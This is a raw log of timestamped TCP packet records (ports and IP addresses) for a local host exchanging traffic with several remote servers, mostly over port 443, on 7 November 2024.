Nov 7, 2024 04:12:07.285990000 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.295475960 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.295742035 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.295747995 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.347475052 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.347480059 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.356172085 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.356211901 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.356241941 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.356254101 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.356259108 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.356450081 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.356489897 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.356985092 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.356990099 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.357158899 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.357184887 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.357563019 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.357568026 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.357877970 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.358143091 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.361558914 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.361641884 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.361665964 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.361680031 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.362099886 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.368376017 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.374341011 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.374396086 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.374418020 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.374425888 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.374835014 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.380439043 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.386709929 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.386739969 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.386789083 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.386794090 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.387052059 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.392582893 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.392637014 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.393166065 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.393170118 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.398684978 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.398767948 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.398772955 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.404640913 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.404958010 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.404963017 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.410679102 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.411326885 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.411330938 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.416757107 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.416857958 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.416865110 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.422719955 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.423075914 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.423088074 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.429359913 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.429718971 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.429725885 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.435014963 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.435337067 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.435342073 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.441047907 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.441143036 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.441148043 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.487731934 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.487741947 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.533494949 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.685707092 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.685811043 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.685864925 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.685897112 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.685915947 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.685931921 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.685965061 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686012983 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686043024 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686065912 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686079979 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686084986 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686121941 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686127901 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686147928 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686177969 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686177969 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686187983 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686269045 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686306000 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686373949 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686398983 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686427116 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686429024 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686434984 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686460018 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686484098 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686511993 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686525106 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686531067 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686558962 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686563015 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686599016 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686629057 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686636925 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686641932 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686693907 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686703920 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686731100 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686759949 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686786890 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686844110 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.686844110 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.686855078 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.687057018 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.687100887 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.687741995 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.687750101 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.687787056 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.688889980 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:09.361965895 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:09.361984015 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:09.362039089 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:09.362183094 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:09.362196922 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:09.387340069 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:09.387397051 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:10.212519884 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.212733984 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.212749004 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.213804007 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.213881016 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.214682102 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.214807034 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.214905977 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.214911938 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.268053055 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.356921911 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:10.356954098 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:10.357011080 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:10.357239962 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:10.357253075 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:10.458415031 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.458481073 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.458520889 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.458545923 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.458563089 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.458604097 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.458611965 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.458619118 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.458664894 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.458671093 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.466804981 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.466851950 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.466859102 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.518040895 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.518047094 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.564934969 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.575185061 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.575254917 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.575320005 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.575328112 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.578243971 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.578324080 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.578330040 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.582180023 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.582242012 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.582247972 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.591161013 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.591221094 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.591227055 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.599554062 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.599621058 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.599627018 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.608246088 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.608305931 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.608311892 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.617042065 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.617094994 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.617101908 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.625720978 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.625781059 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.625787020 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.633907080 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.633980036 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.633985996 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.673724890 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.673732042 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.691921949 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.691963911 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.691998005 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.692008972 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.692023993 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.692059040 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.692193031 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.692236900 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.692244053 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.694961071 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.695019007 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.695034981 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.695041895 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.695085049 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.697586060 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.700896025 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.700938940 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.700961113 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.700968027 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.701009989 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.707442045 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.713664055 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.713713884 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.713716030 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.713731050 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.713772058 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.719568014 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.738610029 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.738667965 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.738675117 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.738729000 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.738766909 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.738769054 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.738782883 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.738821983 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.738827944 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.743731976 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.743788958 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.743793011 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.743803978 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.743864059 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.749856949 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.755892038 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.755939007 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.755944014 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.755960941 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.756001949 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.761895895 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.768060923 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.768109083 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.768119097 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.768126965 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.768170118 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.774034977 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.779902935 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.779969931 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.779970884 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.779985905 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.780042887 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.783205032 CET	49749	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:10.783243895 CET	443	49749	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:10.783330917 CET	49749	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:10.785120010 CET	49749	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:10.785136938 CET	443	49749	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:10.786020994 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.808682919 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.808721066 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.808743000 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.808753014 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.808794022 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.808801889 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.808809996 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.808859110 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.809076071 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.809622049 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.809673071 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.809679985 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.814444065 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.814493895 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.814496994 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.814507961 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.814553022 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.819834948 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.825125933 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.825170994 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.825189114 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.825197935 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.825237989 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.828393936 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.831635952 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.831677914 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.831686020 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.831693888 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.831742048 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.831928968 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:10.831999063 CET	443	49745	216.58.206.46	192.168.2.4
Nov 7, 2024 04:12:10.832053900 CET	49745	443	192.168.2.4	216.58.206.46
Nov 7, 2024 04:12:11.203013897 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:11.203524113 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:11.203540087 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:11.203852892 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:11.203921080 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:11.204463005 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:11.204514027 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:11.205575943 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:11.205631018 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:11.205833912 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:11.205842972 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:11.205858946 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:11.251342058 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:11.251826048 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:11.484251976 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:11.533188105 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:11.533200026 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:11.534185886 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:11.534225941 CET	443	49747	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:11.534281969 CET	49747	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:11.638272047 CET	443	49749	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:11.638380051 CET	49749	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:11.642210007 CET	49749	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:11.642221928 CET	443	49749	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:11.642429113 CET	443	49749	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:11.687865973 CET	49749	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:11.731339931 CET	443	49749	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:11.931654930 CET	443	49749	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:11.931696892 CET	443	49749	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:11.931761980 CET	49749	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:11.931984901 CET	49749	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:11.932003975 CET	443	49749	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:11.932024002 CET	49749	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:11.932034016 CET	443	49749	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:11.991878986 CET	49752	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:11.991908073 CET	443	49752	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:11.991983891 CET	49752	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:11.992235899 CET	49752	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:11.992249966 CET	443	49752	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:12.630980968 CET	49753	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:12.631010056 CET	443	49753	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:12.631069899 CET	49753	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:12.631376028 CET	49753	443	192.168.2.4	142.250.186.78
Nov 7, 2024 04:12:12.631392002 CET	443	49753	142.250.186.78	192.168.2.4
Nov 7, 2024 04:12:12.842191935 CET	443	49752	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:12.842338085 CET	49752	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:12.843554020 CET	49752	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:12.843565941 CET	443	49752	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:12.843806028 CET	443	49752	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:12.845866919 CET	49752	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:12.887334108 CET	443	49752	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:13.090867043 CET	443	49752	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:13.090929985 CET	443	49752	184.28.90.27	192.168.2.4
Nov 7, 2024 04:12:13.091706038 CET	49752	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:13.091834068 CET	49752	443	192.168.2.4	184.28.90.27
Nov 7, 2024 04:12:13.091834068 CET	49752	443	192.168.2.4	184.28.90.27
